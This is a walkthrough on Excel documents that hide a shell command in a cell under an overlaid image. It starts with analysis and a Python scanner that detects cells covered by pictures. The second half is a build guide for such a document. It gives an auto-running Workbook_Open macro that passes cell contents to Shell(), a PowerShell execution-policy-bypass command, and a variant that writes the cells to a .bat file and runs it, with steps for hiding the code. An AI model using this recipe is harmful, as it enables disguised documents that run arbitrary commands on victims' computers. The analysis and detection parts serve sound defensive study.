Social Engineering using Hidden Macros in Excel

In this walkthrough we analyze a malicious document that contains a macro, which is slightly harder than analyzing an .exe, but not impossible.

NOTE: Simply running a tool like oledump or olevba will return the macros in the document.

All it will show is that the macro extracts code from a specific column and executes it using Shell(), which is flagged as suspicious, as shown below:

[Image: macro]

And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:

[Image: active]

But if you hover your mouse over BG1 (or just look a little closer and notice the columns that are not aligned), you will see that there is an image overlaying the code:

[Image: exel]

[Image: power]

Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.
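A visual check of the sheet is unreliable once the overlay is well made, so the same condition can be tested on the file itself. The following is an added example, not code from the original article: it lists non-empty cells that lie under a picture, assuming the sample is an OOXML workbook (.xlsm/.xlsx) whose cells carry an r attribute and whose pictures are stored as twoCellAnchor. The function names and the sample workbook are constructed for illustration.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

S = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
X = "{http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing}"

def cell_pos(ref):  # 'BG1' -> (58, 0): zero-based (col, row), as drawing anchors use
    letters, digits = re.fullmatch(r"([A-Z]+)(\d+)", ref).groups()
    col = sum((ord(ch) - 64) * 26 ** i for i, ch in enumerate(reversed(letters)))
    return col - 1, int(digits) - 1

def parts(z, pattern):  # parsed XML of every package part whose name matches
    return [ET.fromstring(z.read(n)) for n in z.namelist() if re.fullmatch(pattern, n)]

def covered_cells(data):
    """Return [(cell_ref, text)] for non-empty cells lying under a picture anchor."""
    z = zipfile.ZipFile(io.BytesIO(data))
    shared = ["".join(si.itertext()) for root in parts(z, r"xl/sharedStrings\.xml")
              for si in root.iter(S + "si")]
    boxes = [[int(a.find(X + e).find(X + k).text)  # [col0, row0, col1, row1]
              for e in ("from", "to") for k in ("col", "row")]
             for root in parts(z, r"xl/drawings/drawing\d+\.xml")
             for a in root.iter(X + "twoCellAnchor") if a.find(X + "pic") is not None]
    hits = []  # simplification: every drawing is tested against every sheet
    for root in parts(z, r"xl/worksheets/sheet\d+\.xml"):
        for c in root.iter(S + "c"):
            text = "".join(e.text or "" for e in c.iter() if e.tag in (S + "v", S + "t"))
            if c.get("t") == "s" and text:  # shared-string cells store an index
                text = shared[int(text)]
            col, row = cell_pos(c.get("r"))
            if text and any(c0 <= col <= c1 and r0 <= row <= r1 for c0, r0, c1, r1 in boxes):
                hits.append((c.get("r"), text))
    return hits

def sample_workbook():  # constructed sample: only the two parts the scanner reads
    cell = '<c r="%s" t="inlineStr"><is><t>%s</t></is></c>'
    sheet = '<worksheet xmlns="%s"><sheetData><row r="1">%s%s</row></sheetData></worksheet>' % (
        S[1:-1], cell % ("A1", "Invoice"),
        cell % ("BG1", 'powershell.exe -exec bypass -C echo "Hello world"'))
    pos = "<xdr:%s><xdr:col>%d</xdr:col><xdr:row>%d</xdr:row></xdr:%s>"
    drawing = '<xdr:wsDr xmlns:xdr="%s"><xdr:twoCellAnchor>%s%s<xdr:pic/></xdr:twoCellAnchor></xdr:wsDr>' % (
        X[1:-1], pos % ("from", 57, 0, "from"), pos % ("to", 60, 3, "to"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", sheet)
        z.writestr("xl/drawings/drawing1.xml", drawing)
    return buf.getvalue()

if __name__ == "__main__":
    print(covered_cells(sample_workbook()))
```

For untrusted samples, parse with defusedxml.ElementTree instead of xml.etree. A hit is only a lead: legitimate workbooks also place logos over cells, so review the reported text alongside the olevba output.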

Another way to reveal the code extracted from the Excel worksheet is to use MsgBox:

[Image: hello]

Creating the document

What's needed:

  1. A screenshot of a set of blank columns to overlay over the code, for example: [Image: img6]
  2. A macro that extracts the code from the workbook and executes it:
     Private Sub Workbook_Open()
         Data = Sheet1.Range("BG1")
         Shell (Data)
     End Sub
  • Data = Sheet1.Range("BG1") reads the contents of cell BG1 and places it in the variable Data.
  3. The code that will be extracted and executed when the document is opened and the user clicks on "Enable Content":
     powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt

After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert > Illustrations > Images).

Then import the macro into ThisWorkbook and change the Range() argument to match your column. If you entered the data in column A and it is in the 1st row, it would be Range("A1").

Writing multiple lines to a file

Writing multiple lines to a file is simple and only requires adding a few lines of code.

The macro code used is here:

Private Sub Workbook_Open()
1. Dim Path As String
2. Dim FileNumber As Integer
3. FileNumber = FreeFile
4. Data = Sheet1.Range("BG1")
5. Data2 = Sheet1.Range("BG2")
6. Path = "test.bat"
7. Open Path For Output As FileNumber
8. Print #FileNumber, Data
9. Print #FileNumber, Data2
10. Close FileNumber
11. Shell (Path)
End Sub

  • Lines 1-3 are static, keep them as they are. They just define the variables used.
  • Lines 4-6 are dynamic. You will need to change the strings on lines 4 and 5 so that they point to where your code is in the Excel worksheet. Change line 6 to the file path you want.
  • Lines 7-9 are also dynamic: they open the file and write the extracted data to it. Lines 8 and 9 in particular are the lines responsible for writing the data to the file.

Just enter the code you want to write to a file, note the column and row in which it is located, and change the Data and Data2 variables to fit your column and row (add more variables if needed).

Then overlay the code with the blank line screenshot and you're done!
